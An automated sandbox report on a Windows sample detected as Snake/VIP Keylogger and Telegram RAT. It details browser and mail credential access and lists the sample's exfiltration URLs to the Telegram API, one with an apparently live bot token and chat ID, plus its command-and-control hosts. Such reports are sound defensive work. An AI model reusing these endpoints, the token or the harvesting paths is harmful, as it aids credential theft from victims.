                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeQueries volume information: C:\Users\user\Desktop\Yef4EqsQha.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 0.2.Yef4EqsQha.exe.3cce508.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.Yef4EqsQha.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Yef4EqsQha.exe.3d10f28.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Yef4EqsQha.exe.3d10f28.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Yef4EqsQha.exe.3cce508.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Yef4EqsQha.exe PID: 7640, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Yef4EqsQha.exe PID: 7872, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 0.2.Yef4EqsQha.exe.3cce508.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.Yef4EqsQha.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Yef4EqsQha.exe.3d10f28.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Yef4EqsQha.exe.3d10f28.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Yef4EqsQha.exe.3cce508.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.3830796545.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Yef4EqsQha.exe PID: 7640, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Yef4EqsQha.exe PID: 7872, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Yara matchFile source: 0.2.Yef4EqsQha.exe.3cce508.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.Yef4EqsQha.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Yef4EqsQha.exe.3d10f28.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Yef4EqsQha.exe.3d10f28.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Yef4EqsQha.exe.3cce508.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Yef4EqsQha.exe PID: 7640, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Yef4EqsQha.exe PID: 7872, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 0.2.Yef4EqsQha.exe.3cce508.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.Yef4EqsQha.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Yef4EqsQha.exe.3d10f28.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Yef4EqsQha.exe.3d10f28.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Yef4EqsQha.exe.3cce508.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Yef4EqsQha.exe PID: 7640, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Yef4EqsQha.exe PID: 7872, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 0.2.Yef4EqsQha.exe.3cce508.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.Yef4EqsQha.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Yef4EqsQha.exe.3d10f28.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Yef4EqsQha.exe.3d10f28.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Yef4EqsQha.exe.3cce508.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.3830796545.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Yef4EqsQha.exe PID: 7640, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Yef4EqsQha.exe PID: 7872, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                    DLL Side-Loading                    		112
                    Process Injection                    		1
                    Masquerading                    		1
                    OS Credential Dumping                    		1
                    Query Registry                    		Remote Services1
                    Email Collection                    		1
                    Web Service                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		LSASS Memory1
                    Security Software Discovery                    		Remote Desktop Protocol1
                    Archive Collected Data                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
                    Virtualization/Sandbox Evasion                    		Security Account Manager2
                    Process Discovery                    		SMB/Windows Admin Shares1
                    Data from Local System                    		3
                    Ingress Tool Transfer                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook112
                    Process Injection                    		NTDS31
                    Virtualization/Sandbox Evasion                    		Distributed Component Object Model1
                    Clipboard Data                    		4
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                    Obfuscated Files or Information                    		LSA Secrets1
                    Application Window Discovery                    		SSHKeylogging15
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Software Packing                    		Cached Domain Credentials1
                    System Network Configuration Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Timestomp                    		DCSync1
                    File and Directory Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading                    		Proc Filesystem13
                    System Information Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588250 Sample: Yef4EqsQha.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 26 reallyfreegeoip.org 2->26 28 api.telegram.org 2->28 30 6 other IPs or domains 2->30 38 Suricata IDS alerts for network traffic 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 48 9 other signatures 2->48 8 Yef4EqsQha.exe 4 2->8         started        signatures3 44 Tries to detect the country of the analysis system (by using the IP) 26->44 46 Uses the Telegram API (likely for C&C communication) 28->46 process4 file5 24 C:\Users\user\AppData\...\Yef4EqsQha.exe.log, ASCII 8->24 dropped 50 Adds a directory exclusion to Windows Defender 8->50 52 Injects a PE file into a foreign processes 8->52 12 Yef4EqsQha.exe 15 2 8->12         started        16 powershell.exe 23 8->16         started        18 Yef4EqsQha.exe 8->18         started        signatures6 process7 dnsIp8 32 api.telegram.org 149.154.167.220, 443, 49834, 49884 TELEGRAMRU United Kingdom 12->32 34 checkip.dyndns.com 193.122.6.168, 49732, 49757, 49770 ORACLE-BMC-31898US United States 12->34 36 reallyfreegeoip.org 104.21.112.1, 443, 49744, 49751 CLOUDFLARENETUS United States 12->36 54 Tries to steal Mail credentials (via file / registry access) 12->54 56 Tries to harvest and steal browser information (history, passwords, etc) 12->56 58 Loading BitLocker PowerShell Module 16->58 20 WmiPrvSE.exe 16->20         started        22 conhost.exe 16->22         started        signatures9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Yef4EqsQha.exe83%ReversingLabsWin32.Trojan.Leonem
                    Yef4EqsQha.exe71%VirustotalBrowse
                    Yef4EqsQha.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    No Antivirus matches

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    bg.microsoft.map.fastly.net
                    		199.232.210.172
                    		truefalse
                      		high
                      s-part-0017.t-0009.t-msedge.net
                      		13.107.246.45
                      		truefalse
                        		high
                        reallyfreegeoip.org
                        		104.21.112.1
                        		truefalse
                          		high
                          api.telegram.org
                          		149.154.167.220
                          		truefalse
                            		high
                            checkip.dyndns.com
                            		193.122.6.168
                            		truefalse
                              		high
                              checkip.dyndns.org
                              		unknown
                              		unknownfalse
                                		high
                                time.windows.com
                                		unknown
                                		unknownfalse
                                  		high

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  https://reallyfreegeoip.org/xml/8.46.123.189false
                                    		high
                                    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:41:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                      		high
                                      https://api.telegram.org/bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                                        		high
                                        http://checkip.dyndns.org/false
                                          		high

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://www.office.com/Yef4EqsQha.exe, 00000006.00000002.3830796545.00000000029F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/chrome_newtabYef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/ac/?q=Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://api.telegram.orgYef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoYef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://api.telegram.org/botYef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.00000000029DD000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://chrome.google.com/webstore?hl=enYef4EqsQha.exe, 00000006.00000002.3830796545.00000000029F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.ecosia.org/newtab/Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://varders.kozow.com:8081Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://go.micYef4EqsQha.exe, 00000000.00000002.1384875417.0000000000BF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://aborters.duckdns.org:8081Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ac.ecosia.org/autocomplete?q=Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://api.telegram.org/bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-451Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://51.38.247.67:8081/_send_.php?LYef4EqsQha.exe, 00000006.00000002.3830796545.00000000029F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://anotherarmy.dns.army:8081Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchYef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://checkip.dyndns.org/qYef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameYef4EqsQha.exe, 00000000.00000002.1389923913.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Yef4EqsQha.exe, 00000006.00000002.3835066178.0000000003951000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedYef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://reallyfreegeoip.org/xml/Yef4EqsQha.exe, 00000000.00000002.1391181531.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3828787764.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002931000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high

                                                                                        World Map of Contacted IPs

                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs

                                                                                        Public IPs

                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        149.154.167.220
                                                                                        		api.telegram.orgUnited Kingdom
                                                                                        		62041TELEGRAMRUfalse
                                                                                        104.21.112.1
                                                                                        		reallyfreegeoip.orgUnited States
                                                                                        		13335CLOUDFLARENETUSfalse
                                                                                        193.122.6.168
                                                                                        		checkip.dyndns.comUnited States
                                                                                        		31898ORACLE-BMC-31898USfalse

                                                                                        General Information

                                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                                        Analysis ID:1588250
                                                                                        Start date and time:2025-01-10 23:05:14 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 8m 30s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:13
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:Yef4EqsQha.exe
                                                                                        renamed because original name is a hash value
                                                                                        Original Sample Name:f2675f59a65add81d32683e6ec1a2aec2c37547df4ef331c21b5f498ccee7897.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@9/8@5/3
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 50%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 98%
                                                                                        • Number of executed functions: 186
                                                                                        • Number of non-executed functions: 12
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                        Warnings

                                                                                        • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
